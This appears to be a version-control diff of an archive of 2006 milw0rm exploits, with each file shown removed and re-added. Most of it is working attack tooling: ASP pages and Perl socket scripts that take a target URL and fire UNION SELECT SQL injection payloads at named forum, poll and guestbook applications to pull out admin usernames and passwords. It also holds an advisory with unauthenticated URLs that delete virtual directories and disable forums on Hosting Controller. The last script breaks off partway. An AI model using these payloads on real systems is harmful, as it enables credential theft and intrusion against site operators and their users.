<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
</tr>
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">&nbsp;User Password:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
</tr>
</table>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
</form>
</center>
<script language="JavaScript">
write()
functionControl1()
</script>
</body>
</html>
<%
End If
End If
End If
End If
Set objtake = Nothing
%>
# milw0rm.com [2006-10-24]
<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: Berty Forum <= 1.4(index.php) Remote Blind SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit1.asp
'[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ##
'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'===============================================================================================
%>
<html>
<title>Berty Forum v1.4(index.php) Blind SQL Injection Exploit</title>
<head>
<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
}
}
function write(){
setTimeout("writetext()",1000);
}
</script>
</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">Berty Forum &lt;=</b>v1.4(index.php) <u><b>
Blind SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
%>
<%
If islem = "get" Then
string1="/index.php?consult=1&indMemo="
string2="-1%20union select%20"
string3="mdp%20"
string4="from%20"
string5="membre%20"
string6="where%20"
string7="ind like%20"
string8=Request.Form("id")
string9="/index.php?consult=1&indMemo="
string10="-1%20union select%20"
string11="nom%20"
string12="from%20"
string13="membre%20"
string14="where%20"
string15="ind like%20"
string16=Request.Form("id")
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3")
Else
%>
<%
target1 = targettext+string1+string2+string3+string4+string5+string6+string7+string8
target2 = targettext+string9+string10+string11+string12+string13+string14+string15+string16
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
SET objtake = Nothing
End Function
get_username = take(target1)
get_password = take(target2)
getdata=InStr(get_username,"""720"" valign=""top"">" )
username=Mid(get_username,getdata+19,20)
passwd=Mid(get_password,getdata+19,20)
%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
</tr>
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">&nbsp;User Password:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
</tr>
</table>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
</form>
</center>
<script language="JavaScript">
write()
functionControl1()
</script>
</body>
</html>
<%
End If
End If
End If
End If
Set objtake = Nothing
%>
# milw0rm.com [2006-10-24]

View file

@ -1,179 +1,179 @@
<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: Php League v0.82 (classement.php) Remote SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit2.asp
'[Note : exploit file name =>exploit2.asp
'[Note : If Wrong Id = "CTYPE html PUBLIC..... see"
'[Using : Write Target and ID after Submit Click
'===============================================================================================
%>
<html>
<title>Php League v0.82 (classement.php) Remote SQL Injection Exploit</title>
<head>
<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
}
}
function write(){
setTimeout("writetext()",1000);
}
</script>
</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit2.asp">Php League</b>v0.82 (classement.php) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit2.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="10" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
%>
<%
If islem = "get" Then
string2="/consult/classement.php?champ='"
string3="%20union%20select%200,0,concat(char(85),char(115),"
string4="char(101),char(114),char(73),char(68),char(58),"
string5="id,char(32),char(65),char(100),char(109)"
string6=",char(105),char(110),char(63),char(58),admin,char(32),char(85),"
string7="char(115),char(101),char(114),char(78),char(97),char(109),"
string8="char(101),char(58),pseudo,char(32),char(80),char(97),char(115),"
string9="char(115),char(58),char(13),char(10),mot_de_passe)"
string10="%20from%20phpl_membres%20where"
string11="%20id%20like%20"
string12=Request.Form("id")
string13="/*"
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit2.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit2.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit2.asp?islem=hata3")
Else
%>
<%
target1 = targettext+string2+string3+string4+string5+string6+string7+string8+string9+string10+string11+string12+string13
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
SET objtake = Nothing
End Function
get_username = take(target1)
getdata=InStr(get_username,"0 0/" )
username=Mid(get_username,getdata+5,90)
%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">Data:</font></b></td>
<td width="80%">
&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></b></font></p>
</td>
</tr>
</table>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=username%>"></p>
</form>
</center>
<script language="JavaScript">
write()
functionControl1()
</script>
</body>
</html>
<%
End If
End If
End If
End If
Set objtake = Nothing
%>
# milw0rm.com [2006-10-27]
<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: Php League v0.82 (classement.php) Remote SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit2.asp
'[Note : exploit file name =>exploit2.asp
'[Note : If Wrong Id = "CTYPE html PUBLIC..... see"
'[Using : Write Target and ID after Submit Click
'===============================================================================================
%>
<html>
<title>Php League v0.82 (classement.php) Remote SQL Injection Exploit</title>
<head>
<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
}
}
function write(){
setTimeout("writetext()",1000);
}
</script>
</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit2.asp">Php League</b>v0.82 (classement.php) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit2.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="10" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
%>
<%
If islem = "get" Then
string2="/consult/classement.php?champ='"
string3="%20union%20select%200,0,concat(char(85),char(115),"
string4="char(101),char(114),char(73),char(68),char(58),"
string5="id,char(32),char(65),char(100),char(109)"
string6=",char(105),char(110),char(63),char(58),admin,char(32),char(85),"
string7="char(115),char(101),char(114),char(78),char(97),char(109),"
string8="char(101),char(58),pseudo,char(32),char(80),char(97),char(115),"
string9="char(115),char(58),char(13),char(10),mot_de_passe)"
string10="%20from%20phpl_membres%20where"
string11="%20id%20like%20"
string12=Request.Form("id")
string13="/*"
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit2.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit2.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit2.asp?islem=hata3")
Else
%>
<%
target1 = targettext+string2+string3+string4+string5+string6+string7+string8+string9+string10+string11+string12+string13
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
SET objtake = Nothing
End Function
get_username = take(target1)
getdata=InStr(get_username,"0 0/" )
username=Mid(get_username,getdata+5,90)
%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">Data:</font></b></td>
<td width="80%">
&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></b></font></p>
</td>
</tr>
</table>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=username%>"></p>
</form>
</center>
<script language="JavaScript">
write()
functionControl1()
</script>
</body>
</html>
<%
End If
End If
End If
End If
Set objtake = Nothing
%>
# milw0rm.com [2006-10-27]

View file

@ -1,46 +1,46 @@
Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln.
SQL_Injection, Command Injection
-------
[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2
Vendor: Hosting Controller
Vendor URL: www.hostingcontroller.com
Solution: Hotfix 3.3
Found Date: 7/1/2006
Release Date: 10/10/2006
Discussion:
--------------------
UnAuthenticated user can
1- delete every sites virtual directory on hc sites
2- make forum virtual directory (with the desire name) for everysites on hc!
3- disable all hc forums by SQL Injection
4- enable all hc forums by SQL Injection
Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory.
Exploit: (or POC)
--------------------
1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
-----------------------------------------------------------------
2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
-----------------------------------------------------------------
3- unAuthenticated user can disable all hc forums by SQL_Injection
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
-----------------------------------------------------------------
4- unAuthenticated user can enable all hc forums by SQL_Injection
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
--------------------
Credit :
--------------------
Soroush Dalili of Kapda and GSG
IRSDL [4t} kapda <d0t] ir
Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir]
GSG - Grayhatz security group [http://www.Grayhatz.net]
# milw0rm.com [2006-10-27]
Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln.
SQL_Injection, Command Injection
-------
[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2
Vendor: Hosting Controller
Vendor URL: www.hostingcontroller.com
Solution: Hotfix 3.3
Found Date: 7/1/2006
Release Date: 10/10/2006
Discussion:
--------------------
UnAuthenticated user can
1- delete every sites virtual directory on hc sites
2- make forum virtual directory (with the desire name) for everysites on hc!
3- disable all hc forums by SQL Injection
4- enable all hc forums by SQL Injection
Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory.
Exploit: (or POC)
--------------------
1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
-----------------------------------------------------------------
2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
-----------------------------------------------------------------
3- unAuthenticated user can disable all hc forums by SQL_Injection
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
-----------------------------------------------------------------
4- unAuthenticated user can enable all hc forums by SQL_Injection
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
--------------------
Credit :
--------------------
Soroush Dalili of Kapda and GSG
IRSDL [4t} kapda <d0t] ir
Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir]
GSG - Grayhatz security group [http://www.Grayhatz.net]
# milw0rm.com [2006-10-27]

View file

@ -1,21 +1,21 @@
*******************************************************************************
# Title : Techno Dreams Announcement (MainAnnounce2.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page: http://www.t-dreams.com
*******************************************************************************
###http://[target]/[path]/MainAnnounce2.asp?key=[ SQL ]
Example:
//MainAnnounce2.asp?key=204%20union%20select%200,UserName,0,Password,0%20from%20admin
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-10-30]
*******************************************************************************
# Title : Techno Dreams Announcement (MainAnnounce2.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page: http://www.t-dreams.com
*******************************************************************************
###http://[target]/[path]/MainAnnounce2.asp?key=[ SQL ]
Example:
//MainAnnounce2.asp?key=204%20union%20select%200,UserName,0,Password,0%20from%20admin
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-10-30]

View file

@ -1,21 +1,21 @@
*******************************************************************************
# Title : Techno Dreams Guestbook v1.0 (guestbookview.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page: http://www.t-dreams.com
*******************************************************************************
###http://[target]/[path]/guestbookview.asp?key=[ SQL ]
Example:
//guestbookview.asp?key=7782%20union%20select%200,0,adminname,password,0,0,0%20from%20admin
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-10-30]
*******************************************************************************
# Title : Techno Dreams Guestbook v1.0 (guestbookview.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page: http://www.t-dreams.com
*******************************************************************************
###http://[target]/[path]/guestbookview.asp?key=[ SQL ]
Example:
//guestbookview.asp?key=7782%20union%20select%200,0,adminname,password,0,0,0%20from%20admin
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-10-30]

View file

@ -1,87 +1,87 @@
#!/usr/bin/perl
#[Script Name: AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
[// Usage: class.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "MoreInfo.asp?id=";
$target = "-1+union+select+login+from+user+where+no+like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
$targettwo = "-1+union+select+password+from+user+where+no+like%20".$ARGV[2];
$targettwo = $host.$dir.$file.$targettwo;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /ltext\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
print "+**********************************************************************+\n";
print "+ Trying to connect for Password: $server\n";
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket1 "GET $targettwo\n";
print $socket1 "Host: $server\n";
print $socket1 "Accept: */*\n";
print $socket1 "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket1>) {
if ($answer =~ /ltext\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-09]
#!/usr/bin/perl
#[Script Name: AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
[// Usage: class.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "MoreInfo.asp?id=";
$target = "-1+union+select+login+from+user+where+no+like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
$targettwo = "-1+union+select+password+from+user+where+no+like%20".$ARGV[2];
$targettwo = $host.$dir.$file.$targettwo;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /ltext\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
print "+**********************************************************************+\n";
print "+ Trying to connect for Password: $server\n";
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket1 "GET $targettwo\n";
print $socket1 "Host: $server\n";
print $socket1 "Accept: */*\n";
print $socket1 "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket1>) {
if ($answer =~ /ltext\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-09]

View file

@ -1,85 +1,85 @@
#!/usr/bin/perl
#[Script Name: NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "cl_CatListing.asp?cl_cat_ID=";
$target = "-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
$targettwo = "-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_id%20like%20".$ARGV[2];
$targettwo = $host.$dir.$file.$targettwo;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
print "+**********************************************************************+\n";
print "+ Trying to connect for Password: $server\n";
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket1 "GET $targettwo\n";
print $socket1 "Host: $server\n";
print $socket1 "Accept: */*\n";
print $socket1 "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket1>) {
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11]
#!/usr/bin/perl
#[Script Name: NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "cl_CatListing.asp?cl_cat_ID=";
$target = "-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
$targettwo = "-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_id%20like%20".$ARGV[2];
$targettwo = $host.$dir.$file.$targettwo;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
print "+**********************************************************************+\n";
print "+ Trying to connect for Password: $server\n";
